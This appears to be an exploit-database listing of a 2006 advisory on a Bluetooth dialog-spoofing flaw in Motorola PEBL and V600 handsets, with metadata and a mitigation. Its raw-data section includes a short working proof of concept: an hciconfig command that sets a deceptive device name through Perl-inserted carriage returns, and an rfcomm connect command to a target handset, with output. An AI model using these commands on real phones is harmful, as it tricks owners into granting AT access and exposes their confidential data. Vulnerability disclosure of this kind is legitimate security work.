header-logo
Suggest Exploit
vendor:
PEBL and V600 Handsets
by:
SecurityFocus
7.5
CVSS
HIGH
Dialog-Spoofing
287
CWE
Product Name: PEBL and V600 Handsets
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Motorola Mobile Handsets Dialog-Spoofing Vulnerability

Motorola mobile handsets are prone to a dialog-spoofing vulnerability when accepting Bluetooth communications. An attacker could exploit this issue to trick a user into granting them AT access to the device. The attacker could then gather confidential information from the handset.

Mitigation:

Disable Bluetooth communications on the device or limit the range of the Bluetooth signal.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/17190/info

Motorola mobile handsets are prone to a dialog-spoofing vulnerability when accepting Bluetooth communications. An attacker could exploit this issue to trick a user into granting them AT access to the device. The attacker could then gather confidential information from the handset.

Motorola PEBL and V600 handsets are vulnerable to this issue; other devices may also be affected.

# hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'` 
# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)
Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3
Press CTRL-C for hangup
cqrsecured